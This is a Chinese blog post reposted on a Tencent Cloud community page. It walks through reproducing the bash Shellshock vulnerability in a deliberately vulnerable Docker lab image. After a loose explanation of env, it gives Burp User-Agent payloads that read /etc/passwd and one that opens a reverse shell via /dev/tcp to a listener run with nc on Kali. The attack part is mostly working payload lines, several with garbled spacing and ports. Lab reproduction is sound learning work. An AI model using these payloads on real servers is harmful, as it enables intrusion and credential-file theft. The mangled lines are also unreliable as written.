首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >docker小试牛刀之bash_shellshock漏洞复现

docker小试牛刀之bash_shellshock漏洞复现

作者头像
用户1467662
发布2018-03-30 10:45:05
9670
发布2018-03-30 10:45:05
举报
文章被收录于专栏:农夫安全农夫安全

漏洞名称 bash_shellshock

• 首先,问题起因于一个命令ENV。

• 原型:

• env [OPTION]...[NAME=VALUE]... [COMMAND [ARGS]...]

• Man是这么说的:

• Display, set, or remove environment variables,Run a command in amodified environment.

• 我的理解是使用env命令的key=value,首先会改变环境变量key,如果没有会临时创建,注意,这里是临时的改变环境变量。然后就把value后面的内容当做命令执行,类似于PHP中的eval。

利用方法

• 1、pull docker镜像,搭建环境

• docker pull medicean/vulapps:b_bash_shellshock1

• 2、启动镜像

• docker run -d -p 1000:80 medicean/vulapps:b_bash_shellshock1

• 3、使用burp抓包,更改UA

• () { :;};echo ; echo; echo $(/bin/cat/etc/passwd );

• 反弹shell

• () { :; }; /bin/bash -i >& /dev/tcp/192.168.1.12/88880>&1;

• Kali运行

• nc -l -p 8888 -vvv

本文参与 腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2017-09-13,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 网络安全社区悦信安 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 漏洞名称 bash_shellshock
    • 利用方法
    相关产品与服务
    容器镜像服务
    容器镜像服务(Tencent Container Registry,TCR)为您提供安全独享、高性能的容器镜像托管分发服务。您可同时在全球多个地域创建独享实例,以实现容器镜像的就近拉取,降低拉取时间,节约带宽成本。TCR 提供细颗粒度的权限管理及访问控制,保障您的数据安全。
    领券
    问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档